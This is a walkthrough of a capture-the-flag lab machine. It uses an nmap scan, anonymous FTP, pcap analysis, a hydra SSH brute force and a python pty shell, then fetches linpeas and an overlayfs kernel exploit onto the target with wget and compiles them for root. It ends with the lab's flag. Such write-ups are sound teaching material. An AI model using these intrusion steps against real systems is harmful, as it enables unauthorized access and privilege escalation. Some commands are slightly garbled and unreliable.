nmap -sC -sV -p- 192.168.21.146 -oN vulos2
-sC
for default scripts,-sV
for version enumeration and -p-
to scan all ports and -oN
to save the result
In the result we can see services running
Port 21 Ftp
port 22 ssh
port 80 http
Note that we have anonymous FTP login allowed.
we have simple http site when visiting the ip .
Running gobuster reveals the directory /secret
/secret
is nothing but a simple troll page.
Running gobuster at /secret
reveals nothing.
so our next step would be to use anonymous login to ftp.
password is not required while login.
we can see a file called lol.pcap
lets download this file to our machine
get lol.pcap
Lets analyse the .pcap file using wireshark.
looking at packet 40 we have something interesting.
It is saying we almost found directory sup3rs3cr3tdir
lets visit this directory
there is file named roflmao
click and download this file.
From the file we can see there is address /0x0856BF
lets visit this address, we might find something interesting
we have two folders.
under good_luck
folder we have username wordlist.
copy this wordlist and keep it in your machine.
Now the tricky / troll part,
We have Good_job_:)
string under this_folder_contains_this_password
.
At first i thought this should be the password.
but when i tried brute forcing it didn’t work.
this_folder_contains_this_password
if you read the folder name, it is saying this folder contains this password. And this folder contains Pass.txt
. So the password is Pass.txt
we now have username list and password>
lets use hydra to brute force username.
hydra -l username.txt -p Pass.txt ssh://192.168.1.65
here -l
flag is used to specify the username list.-p
flag is used to specify password string which is Pass.txt
so the username is overflow
and password is Pass.txt
lets ssh login with this username and password
we now have shell as user overflow.
Make shell interactive using python -c ‘import pty; pty.spawn(“/bin/bash”)’
I then looked around files like /etc/passwd
, /home
etc in a hope to find any thing interesting. aNd found nothing of interest.
for privilege escalation we will use our best friend linpeas
(Linux Privilege Escalation Awesome Script ) https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
/tmp
directorywget https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
chmod +x linpeas.sh
And comes another troll. Our ssh connection is closed after certain time.
When connection is closed, again login to ssh and download the script.
Once you run the script and get the output we dont need to download the script again .
Looking at the result, we can see machine is vulnerable to various exploit.
Among the exploit I first tried using the dirty cow 2
but g++ was not installed in the machine so i choosed overlafs
exploit
copy the download url.
download the exploit using wget url
Rename the exploit from 37292
to 37292.c
compile the exploit.
Then execute the exploit using ./ofc
This should give us a root shell.
now go to root directory using cd /root
Inside the root directory we have proof.txt
Which contains the flag we need to complete this lab.
cat proof.txt
702a8c18d29c6f3ca0d99ef5712bfbdc